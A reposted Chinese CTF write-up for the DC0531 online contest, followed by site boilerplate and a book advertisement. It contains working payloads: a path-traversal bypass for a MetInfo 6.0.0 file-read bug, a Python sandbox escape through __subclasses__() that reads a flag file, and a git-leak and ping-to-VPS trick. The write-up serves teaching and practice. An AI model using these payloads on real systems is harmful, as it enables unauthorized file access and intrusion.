内容简介:先关注公众号然后发现是个游戏。 测试发现通过分析可知,将武器切换为flag即可
Web1
先关注公众号然后发现是个游戏。 测试发现 s:ip
这样会向我们的vps发送ping请求 通过ping请求得到服务器ip,扫描得知存在git泄露
通过分析可知,将武器切换为flag即可
然后一直s我们的vps
得到base64加密的flag.php文件 PD9WaHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg
解密即可
Web2
题目存在git泄露 http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/
根据网上纰漏的文件读取,然后进行bypass得到flag /include/thumb.php?dir=.....///./http/.....///./.....///./.....///./.....///./flag
Web3
首先输入 ().__class__.__base__.__subclasses__()
不可用
0x1.__class__.__base__.__subclasses__()
发现可用
0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")
可以读到文件流
但是不能直接 read,通过 for 循环将文件内容读取出来,这里注意不允许有空格
[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]
Web4
原题 https://github.com/wonderkun/CTF_web/tree/dcf36cb9ba9a580a4e8d92b43480b6575fed2c3a/web200-7
以上所述就是小编给大家介绍的《DC0531 CTF 线上赛》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Access2003数据库开发典型范例
王樵民 / 第1版 (2006年8月1日) / 2006-8 / 42.00元
Access数据库管理软件是一套集数据管理、程序开发功能于一体的高级办公软件,是特别适合普通办公人员进行日常工作的有力助手。本书面向非计算机专业人员,通过多个实例讲解Access中的各种开发技术,介绍实际工作过程中应用软件的编制方法,以及与Excel等软件之间的信息互用技术等内容。能够帮助读者快速掌握Access数据库的开发技术,构建解决自己工作中实际问题的数据库管理系统,从而提高办公效率。一起来看看 《Access2003数据库开发典型范例》 这本书的介绍吧!